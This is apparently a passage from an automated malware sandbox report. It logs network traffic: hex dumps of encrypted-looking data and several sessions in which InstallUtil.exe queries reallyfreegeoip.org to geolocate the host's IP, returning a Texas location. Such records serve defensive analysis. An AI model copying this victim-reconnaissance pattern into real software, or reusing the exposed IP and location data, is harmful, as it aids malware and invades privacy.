                                                            2024-11-08 10:51:31 UTC8000INData Raw: de 01 e5 7d 35 03 5e c5 1a c7 32 bf bc 8b 16 94 f6 bc 8e 15 df b8 17 88 95 32 b7 8e ea e9 0d 06 05 63 9a fc 69 74 e0 85 c7 58 c6 6d de 7d a7 2e 63 40 db f2 62 cf c4 b7 15 33 2e db 78 b6 3d 10 96 7a 51 77 dd d9 b2 1d 1e 87 83 04 e7 f8 18 56 db 14 9d 08 83 1f 3f f0 eb ea d9 9d b5 ff ea 07 28 66 bc 6b 67 1e 71 c8 92 78 3b db 8f fd f2 6b 53 0c b6 35 1c 83 34 e9 c1 27 34 0e 6b 4c 99 71 ee 7b 7e 1d 88 23 9a ad d5 71 2a 6a bb bf 05 3d 8c 10 37 9b ad e4 5e 2e b7 4b f5 51 48 95 46 1c ea b7 d6 9f 54 81 91 ef c1 6e 2b 33 84 1f 74 ae 9b 68 96 47 ce a1 e7 78 e9 a7 c6 95 c3 f8 19 30 25 da ab 2d a8 48 e5 90 d7 69 4d a9 79 b0 bd d6 30 33 71 53 20 8d dd 6e c2 b3 fa 0d 1f 5a 46 db 16 62 71 54 eb 8c 20 be 83 3e 2c 93 b6 17 77 9c 8a 94 62 f8 11 2a 54 b1 6d ef 31 8b c4 b8 48
                                                            Data Ascii: }5^22citXm}.c@b3.x=zQwV?(fkgqx;kS54'4kLq{~#q*j=7^.KQHFTn+3thGx0%-HiMy03qS nZFbqT >,wb*Tm1H
                                                            2024-11-08 10:51:31 UTC8000INData Raw: 6c 58 31 d2 cd e4 69 99 40 8e 90 eb 26 7d 32 83 5f a7 4f f4 d2 67 54 f9 4a 9d 85 08 d4 65 54 b3 d5 ea 9e 11 db 18 4f 66 df 4c f8 8f 4f 2d 5d 14 3b 8d c7 7c e8 36 00 3d 5f 11 09 73 81 6f 86 53 fa 94 a1 26 bc 36 4c 7b 99 18 c0 c3 75 55 26 2f 9f 58 4e 49 83 7e e5 6f f3 42 8b bd a7 b3 aa 0d bf 66 f3 38 fb 47 17 09 0f ae 39 93 66 c5 b6 52 2b f3 ff ea cb ae d0 dd cb 5d a1 92 89 58 cf fa 30 53 3a e9 3d 2f 65 ca 5f 4b 2e 96 00 45 1d ef 0e 85 f8 39 6f 44 4a e5 12 6f 12 14 4c a0 e5 56 8f 71 c6 78 1e 41 b1 68 58 7c 1d 62 e0 ad 25 05 e5 74 ca 13 bc 8e b3 0d bd 90 ec 5a 9b 4a 6a 23 f4 ab 36 ea 9d f2 b2 bb 8a 5f a0 c5 00 ca 39 b1 13 6a 30 f8 5b 07 b4 8c 78 ec d7 1e cc 5e e9 a4 fd 4b ed 18 ce 58 25 a3 3d 70 b5 36 e8 c9 35 84 10 32 b0 d7 c4 71 a6 a7 2f 9d 5b ad 78 bb 56
                                                            Data Ascii: lX1i@&}2_OgTJeTOfLO-];|6=_soS&6L{uU&/XNI~oBf8G9fR+]X0S:=/e_K.E9oDJoLVqxAhX|b%tZJj#6_9j0[x^KX%=p652q/[xV
                                                            2024-11-08 10:51:31 UTC8000INData Raw: 65 9c c0 b7 50 fd 21 57 44 63 cc 41 fb 7a 75 a7 25 5f 9d 89 78 42 67 6e be 35 29 84 7a 4c 96 c8 b3 e3 d0 ae e4 d0 f9 9d f6 56 0e d4 51 98 dc 50 12 2b fa 0b 39 b0 4e 4c b3 75 8f 41 68 b1 42 28 a6 f0 bd a2 24 56 1e c5 f8 c1 72 eb cc e6 9e 9b 3a a4 82 41 ad 4b 3a a1 dd 8e 0a 19 08 b5 97 d3 60 28 a4 6a a8 6b b6 6a 42 8d 42 59 8e 65 59 fc 2f 08 b1 c0 80 32 99 5c 12 a9 d3 73 84 89 7c bb 03 69 25 85 e1 53 0f 55 f7 12 32 19 92 75 35 8c 5d c5 7c cb aa dd 96 6a f2 1a 4d f3 16 ed ab 89 9a d0 e8 ad 23 4d 1c a2 7b e1 ca 15 c7 81 3c f4 55 26 32 8c b5 57 47 5b e4 f7 40 5c 0d 81 ea 23 1c d4 6e 30 18 39 cd e0 e0 0e 32 be 63 86 01 95 59 c4 f4 ba ee 2f d3 10 c2 c1 a7 c3 7a f7 9d df 66 2a e8 c7 86 e4 69 e9 6e 66 86 1c 1a 77 e6 a5 61 05 dc d8 95 33 1b b3 7d c4 4d 26 e0 e9 55
                                                            Data Ascii: eP!WDcAzu%_xBgn5)zLVQP+9NLuAhB($Vr:AK:`(jkjBBYeY/2\s|i%SU2u5]|jM#M{<U&2WG[@\#n092cY/zf*infwa3}M&U
                                                            2024-11-08 10:51:31 UTC8000INData Raw: 4a 1f 6f 9c 6c d4 37 c8 56 6b a1 81 a1 82 ef 37 9f ed 5b 67 01 9a 5f 71 01 ae c0 1d 30 2f 55 bd 7f 4a 45 8e f0 43 0e e1 5e d1 6d 6f c1 14 d2 57 db e0 15 fc 52 00 98 78 05 bb 7d d4 d9 e3 6e 79 2a f1 f1 04 5a fa 91 ca dc 7c ff 49 b8 22 43 02 b9 16 26 5d 29 a4 aa c9 8f 31 f2 ce bc aa 4b 8a d3 37 34 60 39 0f f7 de 02 93 b7 71 a2 33 6e 72 5e b4 57 57 2e b3 c0 81 70 e3 86 39 dc fa 05 da 54 33 c2 93 35 eb 8c 0a 73 51 ba d3 75 49 7c c7 11 4a 83 c7 b6 67 79 1e 31 ea 73 0e 12 97 4e 98 83 14 be d7 ab 9b bb 06 86 e2 92 44 f5 c3 fd a3 4a f9 dd a6 90 21 81 b4 66 78 39 24 db a4 ac f7 1a 47 ad d2 b2 d9 53 45 b3 b6 a0 6e 3c ef f1 db a0 26 81 a0 f6 fe 30 c2 44 11 55 d2 ec bc 50 6d d2 8b 97 da 81 f1 5a d1 b3 9d d4 f8 1a ac 82 fc 50 35 ef c1 ba 75 71 04 76 93 86 5d 9a 81 1a
                                                            Data Ascii: Jol7Vk7[g_q0/UJEC^moWRx}ny*Z|I"C&])1K74`9q3nr^WW.p9T35sQuI|Jgy1sNDJ!fx9$GSEn<&0DUPmZP5uqv]


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            9192.168.2.549737188.114.96.3443360C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-11-08 10:51:32 UTC87OUTGET /xml/173.254.250.90 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-11-08 10:51:32 UTC1227INHTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:32 GMT
                                                            Content-Type: text/xml
                                                            Content-Length: 359
                                                            Connection: close
                                                            x-amzn-requestid: 6faed900-016e-4e5e-a211-e485a8342369
                                                            x-amzn-trace-id: Root=1-672daf75-5cf9589710b7718d28419240;Parent=29665f1bc67c9060;Sampled=0;Lineage=1:fc9e8231:0
                                                            x-cache: Miss from cloudfront
                                                            via: 1.1 1fe1fb13f3fdb246ffe26042a7d8f9b0.cloudfront.net (CloudFront)
                                                            x-amz-cf-pop: DFW57-P5
                                                            x-amz-cf-id: G4WREKFxOYROHi3MeKGuUlXivgL0Kb3Ff_tGLlXaadTYoynIqx5Zxg==
                                                            Cache-Control: max-age=31536000
                                                            CF-Cache-Status: HIT
                                                            Age: 15807
                                                            Last-Modified: Fri, 08 Nov 2024 06:28:05 GMT
                                                            Accept-Ranges: bytes
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PUGbK%2BKjlFjXhx7OUsaGWRMWPrA9WBhs1nsIC3EMzu1MV7IpBqjAPp91uX%2FzaGt0pfc0Ec5Jl%2FB0t0BtEpWtnyrq2S%2FD7MfvveBO%2BnN60Dx%2F0zj7r3qd8jRr376KN%2BBuED%2BbWgny"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8df5022a1ab446dd-DFW
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1070&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2688950&cwnd=248&unsent_bytes=0&cid=d301ff2598f78ff0&ts=155&x=0"
                                                            2024-11-08 10:51:32 UTC142INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65
                                                            Data Ascii: <Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><Re
                                                            2024-11-08 10:51:32 UTC217INData Raw: 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                            Data Ascii: gionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            10192.168.2.549765188.114.96.34433652C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-11-08 10:51:38 UTC87OUTGET /xml/173.254.250.90 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-11-08 10:51:38 UTC1219INHTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:38 GMT
                                                            Content-Type: text/xml
                                                            Content-Length: 359
                                                            Connection: close
                                                            x-amzn-requestid: 6faed900-016e-4e5e-a211-e485a8342369
                                                            x-amzn-trace-id: Root=1-672daf75-5cf9589710b7718d28419240;Parent=29665f1bc67c9060;Sampled=0;Lineage=1:fc9e8231:0
                                                            x-cache: Miss from cloudfront
                                                            via: 1.1 1fe1fb13f3fdb246ffe26042a7d8f9b0.cloudfront.net (CloudFront)
                                                            x-amz-cf-pop: DFW57-P5
                                                            x-amz-cf-id: G4WREKFxOYROHi3MeKGuUlXivgL0Kb3Ff_tGLlXaadTYoynIqx5Zxg==
                                                            Cache-Control: max-age=31536000
                                                            CF-Cache-Status: HIT
                                                            Age: 15813
                                                            Last-Modified: Fri, 08 Nov 2024 06:28:05 GMT
                                                            Accept-Ranges: bytes
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f3TORudRqUE43%2FRFQ58y15hmQxK1qTmittM0O1rrGINvitcGmjoaf7AwLmYbH09CoSs9yJGDo8tatvtlLAM5rKCKOoKa1Y2LJe1wyfg%2F0ok6FshyYyZ9b19pIe%2BY%2F2o6Y3bqtCPu"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8df5024b1f5f6b6a-DFW
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1230&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2289328&cwnd=251&unsent_bytes=0&cid=22130bc7f3878e19&ts=194&x=0"
                                                            2024-11-08 10:51:38 UTC150INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65
                                                            Data Ascii: <Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName
                                                            2024-11-08 10:51:38 UTC209INData Raw: 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                            Data Ascii: >Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            11192.168.2.549771188.114.96.34433652C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-11-08 10:51:39 UTC63OUTGET /xml/173.254.250.90 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            2024-11-08 10:51:39 UTC1219INHTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:39 GMT
                                                            Content-Type: text/xml
                                                            Content-Length: 359
                                                            Connection: close
                                                            x-amzn-requestid: 6faed900-016e-4e5e-a211-e485a8342369
                                                            x-amzn-trace-id: Root=1-672daf75-5cf9589710b7718d28419240;Parent=29665f1bc67c9060;Sampled=0;Lineage=1:fc9e8231:0
                                                            x-cache: Miss from cloudfront
                                                            via: 1.1 1fe1fb13f3fdb246ffe26042a7d8f9b0.cloudfront.net (CloudFront)
                                                            x-amz-cf-pop: DFW57-P5
                                                            x-amz-cf-id: G4WREKFxOYROHi3MeKGuUlXivgL0Kb3Ff_tGLlXaadTYoynIqx5Zxg==
                                                            Cache-Control: max-age=31536000
                                                            CF-Cache-Status: HIT
                                                            Age: 15814
                                                            Last-Modified: Fri, 08 Nov 2024 06:28:05 GMT
                                                            Accept-Ranges: bytes
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GNiTJRoOFhgJdF6MG8Gk2p3YHnna7oSyvIqSjYusM%2BeIOQmNopUYYpCRPE%2FkumUjXmbw5jPCG8rD5MAZN7oxawmz5bFaov6myzHkRRZ1B%2Fr406JdhOd9v%2BfaXJ2clTVpejqByNeX"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8df5025159ad283f-DFW
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1163&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2187311&cwnd=251&unsent_bytes=0&cid=87f44feff9cc2473&ts=145&x=0"
                                                            2024-11-08 10:51:39 UTC150INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65
                                                            Data Ascii: <Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName
                                                            2024-11-08 10:51:39 UTC209INData Raw: 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                            Data Ascii: >Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            12192.168.2.549782188.114.96.34433652C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-11-08 10:51:40 UTC63OUTGET /xml/173.254.250.90 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            2024-11-08 10:51:40 UTC1223INHTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:40 GMT
                                                            Content-Type: text/xml
                                                            Content-Length: 359
                                                            Connection: close
                                                            x-amzn-requestid: 6faed900-016e-4e5e-a211-e485a8342369
                                                            x-amzn-trace-id: Root=1-672daf75-5cf9589710b7718d28419240;Parent=29665f1bc67c9060;Sampled=0;Lineage=1:fc9e8231:0
                                                            x-cache: Miss from cloudfront
                                                            via: 1.1 1fe1fb13f3fdb246ffe26042a7d8f9b0.cloudfront.net (CloudFront)
                                                            x-amz-cf-pop: DFW57-P5
                                                            x-amz-cf-id: G4WREKFxOYROHi3MeKGuUlXivgL0Kb3Ff_tGLlXaadTYoynIqx5Zxg==
                                                            Cache-Control: max-age=31536000
                                                            CF-Cache-Status: HIT
                                                            Age: 15815
                                                            Last-Modified: Fri, 08 Nov 2024 06:28:05 GMT
                                                            Accept-Ranges: bytes
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Nepmg7z64%2FF0Qqpm5Z5zObkD9UeWEcMluyJffDhTOtxKTW2N%2BpRf6oTCka7v%2BMnxKXJwFZ%2B7ajfHTgkJBk8mNJ%2BVOyAvB9c2OImZZ2wbUPyCSwO7aSJkrQ62Gfn024j0%2BhI29OeS"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8df5025b8d0ce987-DFW
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1301&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2097031&cwnd=251&unsent_bytes=0&cid=f7d8e2482fb39c43&ts=160&x=0"
                                                            2024-11-08 10:51:40 UTC146INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e
                                                            Data Ascii: <Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><Region
                                                            2024-11-08 10:51:40 UTC213INData Raw: 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                            Data Ascii: Name>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            13192.168.2.549791188.114.96.34433652C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-11-08 10:51:42 UTC87OUTGET /xml/173.254.250.90 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-11-08 10:51:42 UTC1223INHTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:42 GMT
                                                            Content-Type: text/xml
                                                            Content-Length: 359
                                                            Connection: close
                                                            x-amzn-requestid: 6faed900-016e-4e5e-a211-e485a8342369
                                                            x-amzn-trace-id: Root=1-672daf75-5cf9589710b7718d28419240;Parent=29665f1bc67c9060;Sampled=0;Lineage=1:fc9e8231:0
                                                            x-cache: Miss from cloudfront
                                                            via: 1.1 1fe1fb13f3fdb246ffe26042a7d8f9b0.cloudfront.net (CloudFront)
                                                            x-amz-cf-pop: DFW57-P5
                                                            x-amz-cf-id: G4WREKFxOYROHi3MeKGuUlXivgL0Kb3Ff_tGLlXaadTYoynIqx5Zxg==
                                                            Cache-Control: max-age=31536000
                                                            CF-Cache-Status: HIT
                                                            Age: 15817
                                                            Last-Modified: Fri, 08 Nov 2024 06:28:05 GMT
                                                            Accept-Ranges: bytes
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SieYKRuvjfovu%2Fh9%2BUJRo12mH3INRmMj6hNWHU%2B7giyT00OkfwIeWkX3gc0ALBqcoMDn%2FxdOyaKc0VQO4Ekm%2FNYp1XhfiWRYi747sESOMlZE8ib%2Bqj1Tz33VA0KHmYGEm1dyfZ2d"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8df50265cbf7eb16-DFW
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1152&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2630336&cwnd=251&unsent_bytes=0&cid=979dc5db004af3a5&ts=154&x=0"
                                                            2024-11-08 10:51:42 UTC146INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e
                                                            Data Ascii: <Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><Region
                                                            2024-11-08 10:51:42 UTC213INData Raw: 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                            Data Ascii: Name>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            14192.168.2.549802188.114.96.34433652C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-11-08 10:51:43 UTC63OUTGET /xml/173.254.250.90 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            2024-11-08 10:51:44 UTC1223INHTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:44 GMT
                                                            Content-Type: text/xml
                                                            Content-Length: 359
                                                            Connection: close
                                                            x-amzn-requestid: 6faed900-016e-4e5e-a211-e485a8342369
                                                            x-amzn-trace-id: Root=1-672daf75-5cf9589710b7718d28419240;Parent=29665f1bc67c9060;Sampled=0;Lineage=1:fc9e8231:0
                                                            x-cache: Miss from cloudfront
                                                            via: 1.1 1fe1fb13f3fdb246ffe26042a7d8f9b0.cloudfront.net (CloudFront)
                                                            x-amz-cf-pop: DFW57-P5
                                                            x-amz-cf-id: G4WREKFxOYROHi3MeKGuUlXivgL0Kb3Ff_tGLlXaadTYoynIqx5Zxg==
                                                            Cache-Control: max-age=31536000
                                                            CF-Cache-Status: HIT
                                                            Age: 15819
                                                            Last-Modified: Fri, 08 Nov 2024 06:28:05 GMT
                                                            Accept-Ranges: bytes
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zMqVtx2rcgza2DWI9PzkzE2X0QSLi3KBWrDId2w%2F2GVfrFex8Y7w2%2BAaH%2FAXRYMVH34iY%2BB9lgtwEhHK3Y%2BdLQEdYub3gD7RcFMWOgfzJQSs3DiBi7xQhtwVAl0LvXTul%2BzRvW9k"}],"group":"cf-nel","max_age":604800}
